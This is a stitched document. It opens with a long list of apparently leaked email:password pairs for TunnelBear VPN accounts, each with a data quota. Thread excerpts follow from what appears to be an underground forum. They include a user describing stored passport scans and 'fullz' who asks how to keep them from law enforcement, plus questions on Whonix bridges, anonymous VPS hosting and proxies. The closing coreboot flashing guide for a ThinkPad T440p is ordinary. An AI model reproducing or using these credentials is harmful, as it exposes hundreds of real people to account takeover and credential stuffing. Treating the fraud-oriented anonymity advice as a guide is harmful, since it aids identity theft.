blueflashlight07@gmail.com:Jinxed2005 500.0 MB Little TunnelBear
gazza155@gmail.com:Fatcunt.01 500.0 MB Little TunnelBear
timothydo95@gmail.com:Perfectday123 10240.0 MB Little TunnelBear
dget-54@laposte.net:Gillian54 500.0 MB Little TunnelBear
slinky3k@gmail.com:l0gitech23 500.0 MB Little TunnelBear
rhys217@yahoo.co.uk:spence217 500.0 MB Little TunnelBear
ryan_masaki@yahoo.com:Lyg3rh3ro 17240.0 MB Little TunnelBear
laraalexiscolegio12@gmail.com:lorenzo99 500.0 MB Little TunnelBear
dirtylotusunderwear@gmail.com:Link2017 10240.0 MB Little TunnelBear
mikkas2002@gmail.com:jmbr2002 500.0 MB Little TunnelBear
giper_sinus@hotmail.co.uk:Vtntjh666 11240.0 MB Little TunnelBear
liberkosk@gmail.com:adriani703 500.0 MB Little TunnelBear
jay.raitt.jr@gmail.com:Jr226880 1500.0 MB Little TunnelBear
willtull@gmail.com:pomelo13 500.0 MB Little TunnelBear
nianio.chojnacki@gmail.com:google15 500.0 MB Little TunnelBear
cuts.onpaper.hearts33@gmail.com:itsmedio99 1500.0 MB Little TunnelBear
leongwenxuan0@gmail.com:wenxuan456123 10240.0 MB Little TunnelBear
tidusconor@gmail.com:vinz2501 1500.0 MB Little TunnelBear
tylerchang888@gmail.com:58995tyler 500.0 MB Little TunnelBear
gearswins@live.com:misfits88 500.0 MB Little TunnelBear
danielgamarra@gmail.com:biohazard 20240.0 MB Little TunnelBear
jessopleelee.lee@gmail.com:knockout174 500.0 MB Little TunnelBear
codmod84@gmail.com:Stevenh99 500.0 MB Little TunnelBear
beethoven2783@hotmail.com:dayron27 0.0 MB Little TunnelBear
renald_0000@yahoo.com:Ronaldo17 500.0 MB Little TunnelBear
danielshroff@hotmail.com:astrodog 500.0 MB Little TunnelBear
dhruvbardwaj@yahoo.com:uniden101 500.0 MB Little TunnelBear
fabcaron7@gmail.com:romraph93100 500.0 MB Little TunnelBear
smartindale39@gmail.com:Yankee393 7500.0 MB Little TunnelBear
jnorcutt85@gmail.com:Caleb12435 500.0 MB Little TunnelBear
kennyjamesdm@hotmail.com:skyline8 500.0 MB Little TunnelBear
felipegori@outlook.com:123felipe 500.0 MB Little TunnelBear
markblackler35@gmail.com:monique71 10240.0 MB Little TunnelBear
drakeborowski57@gmail.com:damn1234 500.0 MB Little TunnelBear
alexandargjorgiev@gmail.com:bryant248 500.0 MB Little TunnelBear
lehtien.david@gmail.com:Hhle706usa 500.0 MB Little TunnelBear
Danila1q@yandex.ru:1q2w3e4r 107400.0 MB Little TunnelBear
truckerjdub@gmail.com:arnold 500.0 MB Little TunnelBear
idisaque05@gmail.com:Idizito05 500.0 MB Little TunnelBear
joshpcs@hotmail.com:Peterpan1 1500.0 MB Little TunnelBear
tableschairsandladders@gmail.com:Hidavid281 500.0 MB Little TunnelBear
rawlex962@gmail.com:4112938759D 500.0 MB Little TunnelBear
ryanfuego@gmail.com:audi120591 1500.0 MB Little TunnelBear
chakkale@gmail.com:907845daaq 2500.0 MB Little TunnelBear
joey.kitchel@yahoo.com:buttface3 0.0 MB Little TunnelBear
corbucristi22@gmail.com:detergent12 500.0 MB Little TunnelBear
crawrpod01@gmail.comragon15 500.0 MB Little TunnelBear
sasori1315@gmail.com:familia30 500.0 MB Little TunnelBear
potato90001@gmail.com:binx0512 500.0 MB Little TunnelBear
austinbhanna@gmail.com:oldman22 500.0 MB Little TunnelBear
atrupb@hotmail.com:54321ati 500.0 MB Little TunnelBear
epberry@gmail.com:vortex21 1500.0 MB Little TunnelBear
wisenchild@gmail.com:Fr0sties1 0.0 MB Little TunnelBear
harrisondg2@gmail.com:Hnd331286 500.0 MB Little TunnelBear
denchikdenchik@gmail.com:jvgisg 10240.0 MB Little TunnelBear
dragonetik@mail.ru:ass618401 500.0 MB Little TunnelBear
albertobrei@hotmail.com:alberto1990 500.0 MB Little TunnelBear
Railgods@gmail.com:amicizia90 2500.0 MB Little TunnelBear
ultimahitzu@gmail.com:raging03 0.0 MB Little TunnelBear
dannylendowski@gmail.com:danny2004 10240.0 MB Little TunnelBear
ismail@rotikaya.com:mailaina 500.0 MB Little TunnelBear
liekens.tim@gmail.com:Lucifer300 500.0 MB Little TunnelBear
jeremyhaas1031@yahoo.com:Apple6pear 0.0 MB Little TunnelBear
irfanzafrishah@gmail.com:013zafri 500.0 MB Little TunnelBear
mittnavn14@gmail.com:gheru584 500.0 MB Little TunnelBear
zomgrobert@gmail.com:kingkeyblade1 500.0 MB Little TunnelBear
austin.durick@yahoo.com:Ad771578 0.0 MB Little TunnelBear
aalfonso82@gmail.com:alfa2204 1500.0 MB Little TunnelBear
adamhoas99@gmail.com:5060legoking 500.0 MB Little TunnelBear
k.skaptsov@gmail.com:Rjcnbr89 10240.0 MB Little TunnelBear
cautwell@gmail.com:meatloaf 500.0 MB Little TunnelBear
dalyah87@gmail.com:qwerasd7 500.0 MB Little TunnelBear
christoffer.reese@gmail.com:4320lejre 500.0 MB Little TunnelBear
b3nfica@hotmail.com:Jack1988 1500.0 MB Little TunnelBear
uriarte.julio@gmail.com:reggae17 500.0 MB Little TunnelBear
t3r3nc3.n6@gmail.comerence110 13240.0 MB Little TunnelBear
kakabahuha@gmail.com:00171920smts 0.0 MB Little TunnelBear
croda360@gmail.com:Mikolaj0615 11240.0 MB Little TunnelBear
nradeljak455@gmail.comotalni1 750.0 MB Little TunnelBear
epe1.rantala@gmail.com:rantala007 500.0 MB Little TunnelBear
stevencharriez@gmail.com:Plut0nic 1500.0 MB Little TunnelBear
alexander38b@hotmail.com:buttazzoni38 1500.0 MB Little TunnelBear
cvz-28@hotmail.com:deporte1990 500.0 MB Little TunnelBear
mitchell.merrilees@hotmail.com:goalieboyz1 500.0 MB Little TunnelBear
davidbymaster@gmail.com:Luis2012 500.0 MB Little TunnelBear
codie.bloomfield@gmail.com:Codie@23 500.0 MB Little TunnelBear
mason.luke92@gmail.com:anthony03 13240.0 MB Little TunnelBear
cavalletta2017@gmail.com:Cavallo12 500.0 MB Little TunnelBear
capique_izzat@hotmail.com:syafiq91 1500.0 MB Little TunnelBear
henryquek77@gmail.com0232460h 750.0 MB Little TunnelBear
underreality58@gmail.com:edotw2os 500.0 MB Little TunnelBear
daniellequade@gmail.com:danielle1 500.0 MB Little TunnelBear
imechoing@gmail.com:Chefboy6 500.0 MB Little TunnelBear
coolmaxcrazy@gmail.com:maxe2001 0.0 MB Little TunnelBear
jabish86@gmail.com:Batman5719 500.0 MB Little TunnelBear
jasony88@gmail.com:SiLvIaS15 500.0 MB Little TunnelBear
coolzero25@hotmail.com:yugioh25 22240.0 MB Little TunnelBear
dennisbernzott1234@gmail.com:1527534dj 500.0 MB Little TunnelBear
rodofsantiago@gmail.com:@Bleach1 1500.0 MB Little TunnelBear
davidtabor1@gmail.com:Addidas11 1500.0 MB Little TunnelBear
caro.mor2r@gmail.com:Ca123456 500.0 MB Little TunnelBear
diego.ricardo02@hotmail.com:dieguin88 17240.0 MB Little TunnelBear
leokon95@gmail.com:acmilan1 9990.0 MB Little TunnelBear
jasonky1127@gmail.com:pnmbgzip 500.0 MB Little TunnelBear
bokitio@gmail.com:portland2 500.0 MB Little TunnelBear
nburleson97@gmail.com:Firestarter2514 10240.0 MB Little TunnelBear
cembaykent@gmail.com:nh2smqm7 500.0 MB Little TunnelBear
caelyboo123@gmail.com:meadow77 2500.0 MB Little TunnelBear
gareth.phillips@hotmail.com:bongo91 500.0 MB Little TunnelBear
corentinrobin1@gmail.com:leurarveil29 500.0 MB Little TunnelBear
karabot3@gmail.com:actionreplay1 500.0 MB Little TunnelBear
xRussky00x@gmail.com:Starx2eight 10240.0 MB Little TunnelBear
jasamdobar512@gmail.com:jasamdobar2 250.0 MB Little TunnelBear
fidedavidp@gmail.comheland12 500.0 MB Little TunnelBear
alexander.kerkfeld@hotmail.de:Hopefull12 0.0 MB Little TunnelBear
dav.s.s@hotmail.com:123abc123 0.0 MB Little TunnelBear
jackwollan@gmail.com:Jackkate665 15500.0 MB Little TunnelBear
Liam963@hotmail.co.uk:Burberry1 500.0 MB Little TunnelBear
ilchukalexy@gmail.com:LolAlexy2 0.0 MB Little TunnelBear
processleaf327@gmail.com:BLUEmoo99 7500.0 MB Little TunnelBear
jamesgomez222@gmail.com:Buencon7 500.0 MB Little TunnelBear
mclercx@gmail.com:mc20121987 500.0 MB Little TunnelBear
dontblink2001@gmail.comigers21 500.0 MB Little TunnelBear
dens11128@gmail.com:genderowo552 500.0 MB Little TunnelBear
castogarcia_@hotmail.com:77344453 500.0 MB Little TunnelBear
calum99.w@gmail.com:Pups1234 500.0 MB Little TunnelBear
politdejan8@gmail.comejan4Ever 750.0 MB Little TunnelBear
randomeye20207@gmail.com:35Teasel 500.0 MB Little TunnelBear
kamil1058@hotmail.comragontamer12 1500.0 MB Little TunnelBear
coolryan89@hotmail.com:Chevrolet99 1500.0 MB Little TunnelBear
coreymoxom24@gmail.com:octoberfest24 500.0 MB Little TunnelBear
reallnw-_-@hotmail.com:1e731ddew 500.0 MB Little TunnelBear
antoniopicazo18102@gmail.com:antosuper18102@ 1500.0 MB Little TunnelBear
andrikos.mit@gmail.com:6976boba 13240.0 MB Little TunnelBear
goldensun_229@hotmail.com:silverelk89 500.0 MB Little TunnelBear
hotlogan@hotmail.fr:Logan912 1500.0 MB Little TunnelBear
pdal6942@gmail.com89032@c 0.0 MB Little TunnelBear
skaterdude2701@gmail.com:maj#2701 500.0 MB Little TunnelBear
jacquesroberts1987@gmail.com:skull2736 0.0 MB Little TunnelBear
danielsryan@hotmail.co.ukink5thecat 1500.0 MB Little TunnelBear
dudecool671@yahoo.com:Jorhunt28 112140.0 MB Little TunnelBear
grout-look@outlook.com:boxer777 500.0 MB Little TunnelBear
timernest82@gmail.com:brentford82 1500.0 MB Little TunnelBear
hassanm625@gmail.com:hassan505 500.0 MB Little TunnelBear
cagritaskn@gmail.com:ceylin24 500.0 MB Little TunnelBear
adamyoshi2184@gmail.com:football2184 11740.0 MB Little TunnelBear
kevgagi08@gmail.com:kegamima3186 1500.0 MB Little TunnelBear
dkj_dkj147@yahoo.com:147258369Dkj 500.0 MB Little TunnelBear
niamhallan@icloud.com:didyazay 500.0 MB Little TunnelBear
jdonaldson2012@gmail.com:Huskalot01 10740.0 MB Little TunnelBear
thunderbuddy828@gmail.com:mas82858 500.0 MB Little TunnelBear
smith.angus02@gmail.com:Fourteen41 500.0 MB Little TunnelBear
christiansmithkik@gmail.com:Cheeks90 500.0 MB Little TunnelBear
joey-wow@hotmail.com:mayson2006 1500.0 MB Little TunnelBear
cocainexd@live.com:lfx1yr4z 500.0 MB Little TunnelBear
arct09@gmail.com:killobot10 500.0 MB Little TunnelBear
thestobe@gmail.com:Sedwardtobe97 500.0 MB Little TunnelBear
georgesjeandarme@hotmail.com:15Pelikaan25 11240.0 MB Little TunnelBear
eizaaz112@gmail.com:siccsystem01 500.0 MB Little TunnelBear
josorio88@gmail.com:jorge1993 500.0 MB Little TunnelBear
kodygadon@hotmail.comietPepsi1 500.0 MB Little TunnelBear
lukasknox0202@gmail.com:Lukecorp00 500.0 MB Little TunnelBear
valiyevali06@gmail.com:Ali619rey 500.0 MB Little TunnelBear
benjamin.cain22@gmail.com:Cai22598 10240.0 MB Little TunnelBear
wejyoung@gmail.com:1woodside 500.0 MB Little TunnelBear
tsijiang@hotmail.com:XCL1988dec31!! 4500.0 MB Little TunnelBear
charlieritchie411@gmail.com:Charlie411 10240.0 MB Little TunnelBear
dhanishs.soni@gmail.com:dhanish9199 9740.0 MB Little TunnelBear
xuskiller@gmail.com:reinosa69 10490.0 MB Little TunnelBear
timj216@gmail.com:Flakey81 2500.0 MB Little TunnelBear
caspertheghost2000@gmail.com:maincoon09 0.0 MB Little TunnelBear
david8393@hotmail.com:beefkake62 500.0 MB Little TunnelBear
eddierd12@live.comh12122tup1d 13240.0 MB Little TunnelBear
erman.bjk.35@gmail.com:erman147 500.0 MB Little TunnelBear
robinrogner@live.se:92robin951 500.0 MB Little TunnelBear
draco10@ya.ru:Awesome12 500.0 MB Little TunnelBear
anthonytran5181@gmail.com:at152080 500.0 MB Little TunnelBear
jrnesredna@gmail.com:jra73528697 500.0 MB Little TunnelBear
whoismric@gmail.comrumstick5 500.0 MB Little TunnelBear
alansalcedo154@gmail.com:nalgonio1 9500.0 MB Little TunnelBear
ysin_ozbek@hotmail.com:6864359Yy 500.0 MB Little TunnelBear
tfable@hotmail.com:243Eighth 500.0 MB Little TunnelBear
demonboii@hotmail.com:gothom01 500.0 MB Little TunnelBear
dragunegor95@mail.ru:Grodno2013 10240.0 MB Little TunnelBear
hajijibib@gmail.com:maccas12 500.0 MB Little TunnelBear
njavt1105@gmail.com:njt11052002 10240.0 MB Little TunnelBear
nadvi.6@gmail.com:Panthua2 500.0 MB Little TunnelBear
nicholasj.meyer1@gmail.com:9jenna12 500.0 MB Little TunnelBear
dondonpunzalan091@gmail.com:seawards091 500.0 MB Little TunnelBear
alexdunn304@gmail.com:dunnman99 14240.0 MB Little TunnelBear
zach.haglund@gmail.com:159951Zach 500.0 MB Little TunnelBear
spiderguyzer0g@gmail.com:darkjak3 11500.0 MB Little TunnelBear
phalnox@gmail.com:own3dlols 500.0 MB Little TunnelBear
chafiscv@gmail.com:palomo12 3500.0 MB Little TunnelBear
cody.harmon911@gmail.com:Redsteel8 500.0 MB Little TunnelBear
zackshackz@gmail.com:hejhejhejhej33 10240.0 MB Little TunnelBear
mihneadan02@yahoo.com:mitupitu2 500.0 MB Little TunnelBear
isaacren0818@gmail.com:sandia18 500.0 MB Little TunnelBear
jeffckuo@gmail.com:chillym14 500.0 MB Little TunnelBear
fletchnix15@gmail.com:Fletcher1425 500.0 MB Little TunnelBear
xtremeplayr009@gmail.com:Patchess123 500.0 MB Little TunnelBear
sergiomarichales@gmail.com:sergio26 1500.0 MB Little TunnelBear
milgregor@gmail.com:shebapie1 500.0 MB iOS Giant
ytlollfunnygamer@gmail.com:monsuno1 0.0 MB Little TunnelBear
bpinzini@gmail.com:Schuyler1 500.0 MB Little TunnelBear
ziyanggreg@gmail.com:Hammeres1 20240.0 MB Little TunnelBear
adamboultwood@me.com:cookies6561 500.0 MB Little TunnelBear
Fran7147@hotmail.com:Franh1325 500.0 MB Little TunnelBear
tafarangw@gmail.comAFARA2004 250.0 MB Little TunnelBear
josemiguel1521@hotmail.comondo1521 500.0 MB Little TunnelBear
casianogalahad@gmail.com:Galathor50 500.0 MB Little TunnelBear
ryokosenpai45@gmail.comerpyMuffins21 2500.0 MB Little TunnelBear
coronado.seba@gmail.com:9etzw7a3 2500.0 MB Little TunnelBear
blitzzits@gmail.com:0515020cd 500.0 MB Little TunnelBear
krookaird@integra.net:Rookie15 500.0 MB Little TunnelBear
jc1706xx@gmail.com:johnfire17 500.0 MB Little TunnelBear
dirt316hoerr@gmail.com:Frog316! 500.0 MB Little TunnelBear
dedi65718@gmail.com:dedi010196 500.0 MB Little TunnelBear
samlewis6127@gmail.com:liberty2 500.0 MB Little TunnelBear
patrickjr@sbcglobal.net:2LovePeople 10240.0 MB Little TunnelBear
chronosgfx@gmail.com:mamathdu45 10240.0 MB Little TunnelBear
oneeyedredninja@gmail.com:Pizza348 500.0 MB Little TunnelBear
jansen6529@yahoo.com:Jansen0604 500.0 MB Little TunnelBear
drow.overlord337@gmail.com:Anime354 500.0 MB Little TunnelBear
onni.ryynanen@gmail.com:Lyynanen6 10240.0 MB Little TunnelBear
daaron_azuas@hotmail.comragones25 500.0 MB Little TunnelBear
wyldy1994@live.co.uk:linkinpark98 500.0 MB Little TunnelBear
concerto@ishtera.net:zohar19a7 500.0 MB Little TunnelBear
charlywehe@hotmail.fr:Schweppes0 10240.0 MB Little TunnelBear
kate.gregg@me.com:Princess1 2500.0 MB Little TunnelBear
alirzaturgt@gmail.com:2547492 500.0 MB Little TunnelBear
damovoi.92@gmail.com:Kuran114 500.0 MB Little TunnelBear
kennyquach17@yahoo.com:kenny062494 500.0 MB Little TunnelBear
crankybag@gmail.com:Guardians42 500.0 MB Little TunnelBear
breixo2@gmail.com:goldberg5 10240.0 MB Little TunnelBear
lukeshin98@gmail.com:dongjin1 500.0 MB Little TunnelBear
dorislmcbride@gmail.com:doris2001 500.0 MB Little TunnelBear
nicktor101@live.nl:korvers112 500.0 MB Little TunnelBear
anderson.chasew@gmail.com:asdfgh12675 1500.0 MB Little TunnelBear
chasemoon1@gmail.com:quinnisapussy12 500.0 MB Little TunnelBear
cloud3zhero@hotmail.com:yy3tfenqhjh 11240.0 MB Little TunnelBear
davidsshoestore@gmail.com:davidotto1 500.0 MB Little TunnelBear
candido1990@gmail.com:pajaron90 500.0 MB Little TunnelBear
linkanab@gmail.com:BerkA149 10240.0 MB Little TunnelBear
game_tips@live.com:beijing123 1500.0 MB Little TunnelBear
appleman33@ymail.com:Checkk1991 500.0 MB Little TunnelBear
contato.caioalguem@gmail.com:z1x1c1v1b1n1m1 12240.0 MB Little TunnelBear
bassheadzunite@gmail.com:sampson01 500.0 MB Little TunnelBear
dominik6.kantor@outlook.com:dominik990 500.0 MB Little TunnelBear
dogankonuk@gmail.com:yasar2008123 10240.0 MB Little TunnelBear
roblesperezjorge@gmail.com:Cimadevila1 1500.0 MB Little TunnelBear
donvova@gmail.com:Baragus23 500.0 MB Little TunnelBear
rhysgee@gmail.com:f1r3d3m0n 500.0 MB Little TunnelBear
loezaemilio@gmail.com:malintzin24 500.0 MB Little TunnelBear
numshock4@gmail.com:Arlionas99 0.0 MB Little TunnelBear
caijiahua123@gmail.com:Iammax123 500.0 MB Little TunnelBear
fuzzyness0@gmail.com:liamadam02 500.0 MB Little TunnelBear
mcavral@gmail.com:4pz1ne74 500.0 MB Little TunnelBear
wolfmenz@hotmail.com:Enzynguri21 500.0 MB Little TunnelBear
barwalakshat@gmail.com:uncharted4 1500.0 MB Little TunnelBear
kazumy2002@hotmail.com:galleta16 500.0 MB Little TunnelBear
subfire1@gmail.com:loganp21 500.0 MB Little TunnelBear
amazingzoc@gmail.com:hdzombies3 500.0 MB Little TunnelBear
tlersun@hotmail.com:metallica 500.0 MB Little TunnelBear
cat_nyika@hotmail.com:jasmine55 116140.0 MB Little TunnelBear
cv99@icloud.com:Zeekstar7499 10240.0 MB Little TunnelBear
connordahne@gmail.com:ConnorDahn3 500.0 MB Little TunnelBear
leonardolentersi@gmail.com:leo26331073 500.0 MB Little TunnelBear
mchristian1999@hotmail.com:mchris99 500.0 MB Little TunnelBear
darrynw@hotmail.com:united99 1500.0 MB Little TunnelBear
caromoreno7@hotmail.com:joaquin15 500.0 MB Little TunnelBear
williamjemery@hotmail.com:leocubcow1 250.0 MB Little TunnelBear
cyrus302-429@outlook.com:Kane1070 500.0 MB Little TunnelBear
deutscherzocker353@gmail.com:Habbo1369 1500.0 MB Little TunnelBear
fxwright1@gmail.com:california117 500.0 MB Little TunnelBear
danielud@gmail.com:Eiv7Eash 500.0 MB Little TunnelBear
dean_arendon@hotmail.com:dean3326 500.0 MB Little TunnelBear
dastepps@gmail.com:S!Rarthur1 1500.0 MB Little TunnelBear
baby.duddington@googlemail.com:Bramble5 500.0 MB Little TunnelBear
connorchristophr@gmail.com:djConnor123 500.0 MB Little TunnelBear
ethanbrumley@yahoo.com:3858dlm3 3500.0 MB Little TunnelBear
szpvd10@gmail.com:Skorpio99 500.0 MB Little TunnelBear
dfrdr123@gmail.com:Calumjay1 500.0 MB Little TunnelBear
maxwelly89@gmail.com:n82forever 1500.0 MB Little TunnelBear
nathan.220293@hotmail.com:7jpvpchvr 500.0 MB Little TunnelBear
sgedelekyan56@gmail.comURTLEdesk1738 500.0 MB Little TunnelBear
chrisglass9873@outlook.comietcoke101 10240.0 MB Little TunnelBear
casperaryez@hotmail.com:Creseliax123 1500.0 MB Little TunnelBear
djfreakyx@googlemail.com:Freedakiss123 2500.0 MB Little TunnelBear
daiker@live.com:Peridot1 500.0 MB Little TunnelBear
Venoxasss@gmail.com:vova1988 1500.0 MB Little TunnelBear
forsain42@gmail.com:finwe123 500.0 MB Little TunnelBear
dinar2001_21@mail.ru:20010721Dino 500.0 MB Little TunnelBear
elijahlrichards@gmail.com:birdcity602 500.0 MB Little TunnelBear
oskarmarkebo58@gmail.com:H8j55etbh 500.0 MB Little TunnelBear
joolte00@hotmail.comerska_90 500.0 MB Little TunnelBear
noah50833@gmail.com:Slippey50833 500.0 MB Little TunnelBear
danielbyrne70@gmail.com:sootyskip 500.0 MB Little TunnelBear
m.mahuika@hotmail.com:popcorn1 500.0 MB Little TunnelBear
williamscurtis2013@yahoo.com:SuperC14 0.0 MB Little TunnelBear
nisha-@outlook.com:nisha2510 10240.0 MB Little TunnelBear
captainahoy167@gmail.com:icecream167 500.0 MB Little TunnelBear
alfie.dye@gmail.com:Starcruiser1 500.0 MB Little TunnelBear
sibearuk@yahoo.com:hornyguy 10240.0 MB Little TunnelBear
rensboogerd95@gmail.com:asdqweR10 500.0 MB Little TunnelBear
emret20000@gmail.com:Mhtc19621970 500.0 MB Little TunnelBear
harpreetsingh-s@hotmail.com:Harpreet94 500.0 MB Little TunnelBear
jvalamis@gmail.com:steelseries1 500.0 MB Little TunnelBear
detlefsamplonius@gmail.com:detlef6a 13240.0 MB Little TunnelBear
aizazislam113@gmail.com:aizaz113 3000.0 MB Little TunnelBear
dedyshka62@gmail.com:unamed34 250.0 MB Little TunnelBear
kronx@live.co.uk:london22 10240.0 MB Little TunnelBear
pkbeast@yahoo.com:lollie8698 10240.0 MB Little TunnelBear
davidfernandez26@hotmail.com:sargento26 500.0 MB Little TunnelBear
akosta02@yandex.ru:Game2016 16240.0 MB Little TunnelBear
nicholasvaillette95@gmail.com:Opajuice#1 500.0 MB Little TunnelBear
tacosandfries@gmail.com:00square 500.0 MB Little TunnelBear
casparvervuurt@hotmail.com:Castve2000 500.0 MB Little TunnelBear
thebigz198506@gmail.com:zac11385 500.0 MB Little TunnelBear
dylan.929@hotmail.com:Password8808 500.0 MB Little TunnelBear
seewanp97@gmail.com:Car2apple 3500.0 MB Little TunnelBear
lethalsourog@outlook.com:knightr55 500.0 MB Little TunnelBear
rhyswalker360@hotmail.com:Kazmodan123 500.0 MB Little TunnelBear
altair2220@yahoo.com:xboxgeek1809 500.0 MB Little TunnelBear
appieboy910@gmail.com:kfmpah12 10240.0 MB Little TunnelBear
bilduya@hotmail.com:iammoose25 500.0 MB Little TunnelBear
popo987812@gmail.comeamsolder12 500.0 MB Little TunnelBear
bradyftw000@gmail.com:Moclaw01 500.0 MB Little TunnelBear
destinyizkey1695@yahoo.comestiny1695 500.0 MB Little TunnelBear
dani_devey_jr@hotmail.com:Anarchie42 500.0 MB Little TunnelBear

best mac setup for anonymity

ID: 676533bbb4103b69df371b27
Thread ID: 65174
Created: 2022-04-03T12:42:20+0000
Last Post: 2022-04-03T12:58:13+0000
Author: Sam1201
Replies: 1 Views: 259

hello.. i currently use mac but the new one doesnt allow bootcamp. i was wondering do i need a vm or am i too paranoid. i currently use mobile hotspot>vpn>rdp>socks but i store some files on my mac such as data(passport scans, fullz, telegram and jabber) but i do not do dirt on the mac. i have set up a secondary profile on the mac also and set up that encryption thing macs have.. but i have discover that enforcement can bruteforce passwords? or is this false information.

thanks in advance

Whonix Gateway - как прописать мосты вручную?

ID: 676533bbb4103b69df371b47
Thread ID: 62754
Created: 2022-02-10T15:46:53+0000
Last Post: 2022-02-11T00:06:06+0000
Author: JuniorHacker
Replies: 3 Views: 258

Последнее время Whonix не подключается к ТОРу, подскажите пожалуйста, как пошагово прописать мосты, чтобы она подключалась?

Is anonhost.xyz trustable?

ID: 676533bbb4103b69df371b1b
Thread ID: 65633
Created: 2022-04-15T10:13:49+0000
Last Post: 2022-04-28T22:07:06+0000
Author: kitsunefx
Replies: 4 Views: 257

I found this site that claims to provide anonymous VPS services and I wanna know if anyone has any experience with these people and if they're trustable enough

Oracle free VPS

ID: 676533bbb4103b69df371b98
Thread ID: 57518
Created: 2021-10-09T00:05:57+0000
Last Post: 2021-10-09T08:28:00+0000
Author: akriosss47
Replies: 2 Views: 257

Здравствуйте ничего не понимаю в vps поэтому решил спросить,зарегистрировался на oracle vps планирую использовать для bug bounty,recon и тд,Незнаю как правильно настроить и второй вопрос допустил cloud взломают,смогут добратся до персонального pc или только то что на облаке будет доступ?

Опрос по прокси, как выбрать выбрать лучшие

ID: 676533bbb4103b69df3719c2
Thread ID: 106115
Created: 2024-01-18T12:55:30+0000
Last Post: 2024-01-22T19:41:31+0000
Author: booblik
Replies: 1 Views: 257

Всем привет, хочу провести мини опрос, буду очень благодарен за ответы от тех, кто регулярно пользуется проксями

Есть очень много прокси провайдеров. Как выбрать лучший? Что такое лучший прокси сервис?

У вас уже есть сервис которым вы пользуетесь, что может поспособствовать перейти на другой сервис?

Чего необходимо добавить/исправить в том сервисе, которым вы пользуетесь сейчас, чтобы это был идеальный сервис?

Установка Coreboot на Lenovo ThinkPad T440p

ID: 676533bbb4103b69df371b92
Thread ID: 57799
Created: 2021-10-16T16:18:50+0000
Last Post: 2021-10-16T16:18:50+0000
Author: Arg0s
Replies: 0 Views: 256

В данной статье я хочу описать процесс компиляции и установки coreboot на ноутбук lenovo thinkpad t440p.
Для компиляции и установки coreboot нам понадобится программатор с клипсой и другое устройсво, под управлением какого-либо дистрибутива линукс(в моем случае - debian).
Приступим к процессу:
Для начала, необходимо разобрать ноутбук, чтобы получить доступ к микросхемам биоса(в данном ноутбуке их 2)

На рабочем устройстве устанавливаем необходимые программы для компиляции прошивки и работы с программатором

Code:Copy to clipboard

sudo apt install base-devel curl git gcc-ada ncurses zlib nasm sharutils unzip flashrom

После этого создаем рабочую папку, где будут хранится файлы для создания прошивки (в моем случае, папка называется t440p)

Code:Copy to clipboard

mkdir ~/<название_папки>/

Переходим в данную папку

Code:Copy to clipboard

cd ~/<название_папки>/

Присоеденяем клипсу к верхнему чипу (на 4MB) и пробуем считать информацию с чипа

Code:Copy to clipboard

sudo flashrom -p ch341a_spi

Если всё нормально, делаем бекап образа с данного чипа

Code:Copy to clipboard

sudo flashrom --programmer ch341a_spi -r <название_образа_чипа>.bin

Аналогичную операцию делаем с нижним чипом (на 8MB).
Объеденим 2 образа в 1

Code:Copy to clipboard

cat <название_образа_чипа_8MB>.bin <название_образа_чипа_4MB>.bin > <название_образа_12MB>.rom

Переходим в домашнюю директорию и скачиваем coreboot

Code:Copy to clipboard

git clone https://review.coreboot.org/coreboot

Переходим в директорию с coreboot

Code:Copy to clipboard

cd ~/coreboot

Сверем контрольные суммы

Code:Copy to clipboard

git checkout fbc46a3bfb507beb872aafc76dc77f4b7095c51a

Скачиваем дополнительные модули

Code:Copy to clipboard

git submodule update --init --checkout

Собираем ifdtool

Code:Copy to clipboard

cd util/ifdtool && make

Берем блобы из оригинального биоса, выполняя последовательно слебующие команды:

Code:Copy to clipboard

./ifdtool -x ~/<название_рабочей_папки>/<название_образа_12MB>.rom mv flashregion_0_flashdescriptor.bin ~/<название_рабочей_папки>/ifd.bin mv flashregion_2_intel_me.bin ~/<название_рабочей_папки>/me.bin mv flashregion_3_gbe.bin ~/<название_рабочей_папки>/gbe.bin

Получаем mrc.bin, выполняя следующие команды:

Code:Copy to clipboard

cd ~/coreboot make -C util/cbfstool cd util/chromeos ./crosfirmware.sh peppy ../cbfstool/cbfstool coreboot-*.bin extract -f mrc.bin -n mrc.bin -r RO_SECTION mv mrc.bin ~/<название_рабочей_папки>/mrc.bin

Конфигурируем образ coreboot(для облегчения задачи, я взял готовый конфиг с полезной нагрузкой Tianocore)

Code:Copy to clipboard

cd ~/coreboot nano .config

В открывшеея окно вставляем следующие строки:

Code:Copy to clipboard

CONFIG_USE_OPTION_TABLE=y CONFIG_TIMESTAMPS_ON_CONSOLE=y CONFIG_VENDOR_LENOVO=y CONFIG_CBFS_SIZE=0x200000 CONFIG_LINEAR_FRAMEBUFFER_MAX_WIDTH=2560 CONFIG_LINEAR_FRAMEBUFFER_MAX_HEIGHT=1600 CONFIG_IFD_BIN_PATH="/home/<имя_пользователя>/<название_рабочей_папки>/ifd.bin" CONFIG_ME_BIN_PATH="/home/<имя_пользователя>/<название_рабочей_папки>/me.bin" CONFIG_GBE_BIN_PATH="/home/<имя_пользователя>/<название_рабочей_папки>/gbe.bin" CONFIG_CONSOLE_CBMEM_BUFFER_SIZE=0x20000 CONFIG_HAVE_IFD_BIN=y CONFIG_BOARD_LENOVO_THINKPAD_T440P=y CONFIG_PCIEXP_L1_SUB_STATE=y CONFIG_PCIEXP_CLK_PM=y CONFIG_HAVE_MRC=y CONFIG_MRC_FILE="/home/<имя_пользователя>/<название_рабочей_папки>/mrc.bin" CONFIG_UART_PCI_ADDR=0x0 CONFIG_VALIDATE_INTEL_DESCRIPTOR=y CONFIG_H8_SUPPORT_BT_ON_WIFI=y CONFIG_HAVE_ME_BIN=y CONFIG_CHECK_ME=y CONFIG_USE_ME_CLEANER=y CONFIG_HAVE_GBE_BIN=y CONFIG_SUBSYSTEM_VENDOR_ID=0x0000 CONFIG_SUBSYSTEM_DEVICE_ID=0x0000 CONFIG_SMMSTORE_SIZE=0x40000 CONFIG_DRIVERS_PS2_KEYBOARD=y CONFIG_TPM_DEACTIVATE=y CONFIG_SECURITY_CLEAR_DRAM_ON_REGULAR_BOOT=y CONFIG_POST_IO_PORT=0x80 CONFIG_PAYLOAD_TIANOCORE=y CONFIG_TIANOCORE_BOOTSPLASH_IMAGE=y CONFIG_TIANOCORE_BOOTSPLASH_FILE="/home/<имя_пользователя>/<название_рабочей_папки>/bootsplash.bmp"

Сохраняем изменения и создаем конфиг

Code:Copy to clipboard

cd ~/coreboot make nconfig

В открывшемя окне, жмем F9(либо, можно изменить конфигурцию под ваши требования)
